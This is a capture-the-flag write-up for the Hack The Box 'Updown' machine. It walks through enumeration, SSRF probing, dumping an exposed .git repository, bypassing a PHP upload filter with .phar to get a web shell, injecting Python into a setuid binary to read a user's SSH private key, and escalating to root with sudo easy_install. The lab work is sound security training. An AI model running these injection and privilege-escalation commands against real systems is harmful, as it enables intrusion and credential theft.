Hackthebox - Updown
Linux
Nmap
┌──(kali㉿kali)-[~/Documents/hackthebox/updown]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.177
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-05 15:15 EST
Nmap scan report for 10.10.11.177
Host is up (0.025s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e1f98d7c8ba61dbf149669d701702e7 (RSA)
| 256 c21cfe1152e3d7e5f759186b68453f62 (ECDSA)
|_ 256 5f6e12670a66e8e2b761bec4143ad38e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/5%OT=22%CT=1%CU=31935%PV=Y%DS=2%DC=I%G=Y%TM=63B73002
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11
OS:NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.93 secondsPort 80
When we go to
http://10.10.11.177/we land here
Seems like we'll have some fun ^^
Let's add this in /etc/hosts first
10.10.11.177 siteisup.htb
subdomain enum wfuzz
┌──(kali㉿kali)-[~]
└─$ wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://siteisup.htb/' -H "HOST: FUZZ.siteisup.htb" --hc 200
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://siteisup.htb/
Total requests: 100000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000022: 403 9 L 28 W 281 Ch "dev - dev"
000037212: 400 10 L 35 W 301 Ch "* - *"
Total time: 347.2654
Processed Requests: 100000
Filtered Requests: 99998
Requests/sec.: 287.9641Let's add the subdomain in our hosts we get a 403 here
Gobuster
┌──(kali㉿kali)-[~/Documents/hackthebox/updown]
└─$ gobuster dir -u http://siteisup.htb/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://siteisup.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/05 15:21:42 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/dev (Status: 301) [Size: 310] [--> http://siteisup.htb/dev/]
/server-status (Status: 403) [Size: 277]
Progress: 20425 / 20476 (99.75%)===============================================================
2023/01/05 15:22:46 Finished
===============================================================/dev is a blank page. Let's try to run gobuster in it
┌──(kali㉿kali)-[~/Documents/hackthebox/updown]
└─$ gobuster dir -u http://siteisup.htb/dev -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://siteisup.htb/dev
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/05 16:09:09 Starting gobuster in directory enumeration mode
===============================================================
/.git (Status: 301) [Size: 315] [--> http://siteisup.htb/dev/.git/]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
Progress: 20369 / 20476 (99.48%)===============================================================
2023/01/05 16:10:14 Finished
===============================================================Let's also try to dir bust the subdomain dev. So not possible because of the status code
Look around
Ok now let's do what I was tempted to do since I saw the landig page
python3 -m http.server 80In the browser let's try to see if we can interact this way and enter
http://10.10.14.10/testin the formAnd it works our server get an interaction from the target
Ok what happens if we request for something that exist like if I just ask for
http://10.10.14.10/orhttp://127.0.0.1:80/
So we should try to get files or inject command or see what open port we have using this technique
We can fuzz for open ports with burp intruder
We send our request to the intruder we postiton our payload in the port number like this
In the payloads tab we choose number. And start from 1 to 65535 with a step of 1.
If you do not have the pro version of burp the best way would be to use another tool because community version might be slow for this.
Let's grep
is up.so in options grep match we delete the table and add our string
Let's see our results. So it was worth trying but besides port 80 we do not have anything
Let's check the git folder we found
This article on Hacktricks is interesting to see how we could process with this
wget -r http://siteisup.htb/dev/.git/then we can use
git diffgo in the dev directory and rungit diff > diff.txtthis way you can look and grep and really analyze the fileIt is worth having a look at the git documentation to see useful git commands
Other interesting commands are the
git logwe will have the commit history andgit show <commit-id>to have more info on a specific commitThis commit is really interesting
┌──(kali㉿kali)-[~/…/updown/gitfolder/siteisup.htb/dev]
└─$ git show bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab 1 ⚙
commit bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 16:37:20 2021 +0200
Update .htaccess
New technique in header to protect our dev vhost.
diff --git a/.htaccess b/.htaccess
index 3190432..44ff240 100644
--- a/.htaccess
+++ b/.htaccess
@@ -1,5 +1,4 @@
-AuthType Basic
-AuthUserFile /var/www/dev/.htpasswd
-AuthName "Remote Access Denied"
-Require ip 127.0.0.1 ::1
-Require valid-user
+SetEnvIfNoCase Special-Dev "only4dev" Required-Header
+Order Deny,Allow
+Deny from All
+Allow from env=Required-HeaderWith this commit we know that in order to access the .htpasswd we need this header in the request
Special-Dev: only4devand our Ip should be 127.0.0.1. We alse need a valid pair of credentialsThis one is also interesting
┌──(kali㉿kali)-[~/…/updown/gitfolder/siteisup.htb/dev]
└─$ git show 6ddcc7a8ac393edb7764788c0cbc13a7a521d372 1 ⚙
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccess
diff --git a/.htaccess b/.htaccess
new file mode 100644
index 0000000..3190432
--- /dev/null
+++ b/.htaccess
@@ -0,0 +1,5 @@
+AuthType Basic
+AuthUserFile /var/www/dev/.htpasswd
+AuthName "Remote Access Denied"
+Require ip 127.0.0.1 ::1
+Require valid-userLet's try to add the new header everywhere and see what we get
To do so in burpsuite this article is really helpful
So here is what it looks like in my Burp
So let's try to navigate to
http://dev.siteisup.htb/We have access to a new page, with a file upload functionality
The admin panel link and the changelog do not give anything
I tried a php file and it is doing some checks.
Maybe there is a way to have a look at the code using the git we found. This way we can see how to bypass this restriction.
Ok let's try the tool git dumper mentioned in hacktricks
python3 -m venv git-dumperI prefer to install it in a venv so that I do not mess up my local pythonsource git-dumper/bin/activatewe activate the envpip install git-dumperwe install in in the envgit-dumper http://siteisup.htb/dev/.git/ dumpedsiteSo now we can see some php file. the index is not where the extension is verified but the checker seems interesting. This function is the one that is of interest for us
if($_POST['check']){
# File size must be less than 10kb.
if ($_FILES['file']['size'] > 10000) {
die("File too large!");
}
$file = $_FILES['file']['name'];
# Check if extension is allowed.
$ext = getExtension($file);
if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
die("Extension not allowed!");
}
# Create directory to upload our file.
$dir = "uploads/".md5(time())."/";
if(!is_dir($dir)){
mkdir($dir, 0770, true);
}
# Upload the file.
$final_path = $dir.$file;
move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
# Read the uploaded file.
$websites = explode("\n",file_get_contents($final_path));
foreach($websites as $site){
$site=trim($site);
if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
$check=isitup($site);
if($check){
echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
}else{
echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
}
}else{
echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
}
}
# Delete the uploaded file.
@unlink($final_path);
}Very convenient once our file is uploaded we will even know where to fetch it (
http://dev.siteisup.htb/uploads/). However it will also delete the file so we have to be quick.php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/ihere are the file not allowed. This article on hacktricks has nice information on how to bypass these protectionsIt mentions phtm which is not in the list. Let's try it. We can upload it.
The best way I can think of to gain time is to put a big url list in the file and add our payload at the end of this list
Also be careful to put too many url at the begining because the file limit is 10kb
phtm does not get interpreted let's try another one in hacktricks there is also .phar. Let's try it
It seems like what is failing me is not the extention but the php file I am using.
Let's try another php shell. We get a shell as www-data
Becoming developer
We need to move to the user developer (we know the user is called developer with
ls /home) because we can not read the user flag now.Let's upgrade the shell first
python3 -c 'import pty;pty.spawn("/bin/bash")'Here is the full process
python3 -c 'import pty;pty.spawn("/bin/bash")'
// Background our nc / rlwrap nc connection
Ctrl - z
// Enable standard terminal commands
stty raw -echo;fg
//Reset the shell so we can configure it with our current settings
reset
//Enter the terminal info we noted earlier
Terminal type?
xterm-256color
stty rows 39 columns 190In the developer home we can not cat the user we do have access to the python file that processes the websites to see if they are up
If we make a file on siteisup here is what we have
file siteisup
siteisup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b5bbc1de286529f5291b48db8202eefbafc92c1f, for GNU/Linux 3.2.0, not strippeIt has the suid bit set. If we launch it we have a prompt to put an url
This is launch as the user developer so this how we could move to this user. We could try to inject code and get files. When enumering the home of developer there was an ssh folder that we had a permission denied on. We could try to get an ssh key from here. This article explains how to execute os commands in python.
Let's try this
__import__('os').system('cat /home/developer/.ssh/id_rsa')id_rsa is the default name for a private ssh key let's hope it will work in our case.We get the private key!!
So now we just need to copy it and paste it in our machine, then we will just have to change the rights and ssh -i as developer. Let's try this!
It works
We can grab the user flag
Privesc
First thing I usually do in linux when I have a user is
sudo -land here we get this interesting output:
With some research we find out that easy_install is deprecated. And we can find it on the one and only GTFOBINS
Let's try this
TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo easy_install $TFIt works
We can get the root flag!
Last updated